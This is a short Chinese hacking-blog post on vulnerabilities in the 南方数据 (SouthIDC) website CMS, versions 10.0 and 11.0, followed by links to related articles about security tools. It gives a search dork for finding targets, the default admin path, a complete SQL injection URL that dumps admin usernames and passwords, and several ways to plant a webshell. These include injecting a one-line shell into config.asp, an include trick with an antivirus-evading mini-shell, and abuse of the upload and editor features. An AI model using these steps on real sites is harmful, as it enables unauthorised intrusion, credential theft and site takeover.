南方数据网站漏洞

hacker5年前黑客文章1474

漏洞影响版本 v10.0 v11.0

关键字:inurl:”HomeMarket.asp”

默认后台:/admin

直接爆用户密码:
http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’

拿shell *** 貌似有4种:

1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。

2、进后台备份数据库

3、在网站配置的版权信息里插入一句话,一句话地址写入到http://www.xxx.com/inc/config.asp3.1、另外一种插配置:之一步  网站配置添加TXT保存成功后第2步传一个TXT小马小马要免杀的。第3步  网站配置 利用包含得到小马”%><!–#include file=”201331420455473.txt “–><%’填入网站配置。

4、编辑器:/admin/southidceditor/admin_style.asp

标签: 黑客技术

相关文章

Honeyd是不是适用全部电脑操作系统?

Honeyd是不是适用全部电脑操作系统?

什么叫Honeyd? Honeyd由Niels Provos建立,是一个开源代码,使客户可以在各种各样计算机网上建立和运作云虚拟主机。客户能够 配备这种云虚拟主机来仿真模拟不一样种类的网络服务器,使...

DenialofService(DoS)系统漏洞的网址

DenialofService(DoS)系统漏洞的网址

Denial of Service (DoS)是分布式系统拒绝服务攻击攻击器;   doser.py是一款用Python撰写的于HTTP或HTTPS恳求的DoS专用工具;主要是对于有“ap...

TripwireCorp企业如今致力于付钱公司配备操纵商品

TripwireCorp企业如今致力于付钱公司配备操纵商品

什么叫Tripwire? Tripwire是一个文件目录和文档md5验证器。此专用工具可协助计算机管理员和客户查验特定的文档集以开展变更。该专用工具能够 通告管理人员是不是有伪造或毁坏的文档,因而能...

IDAPro是不是适用全部电脑操作系统?

IDAPro是不是适用全部电脑操作系统?

什么叫IDA Pro? IDA是一个多服务平台(包含Linux)多处理器反汇编和程序调试,程序猿和开发者能够应用它来调节其程序运行。“IDA反汇编和程序调试”在评定编码失败时,早已变成一个火爆的专用...

TamperData是否适用全部电脑操作系统?

TamperData是否适用全部电脑操作系统?

什么叫Tamper Data? Tamper Data是Mozilla Firefox拓展,能够在推送HTTP恳求以前改动和查询HTTP恳求。它将显示信息Web电脑浏览器意味着您推送的数据信息,比如...

ParosProxy是不是适用全部电脑操作系统?

ParosProxy是不是适用全部电脑操作系统?

什么叫Parox Proxy? Parox Proxy是一种根据Java的Web代理商,用以评定Web程序运行中的系统漏洞。此专用工具适用查询和编写HTTP / HTTPS信息,以变更表一个字段和C...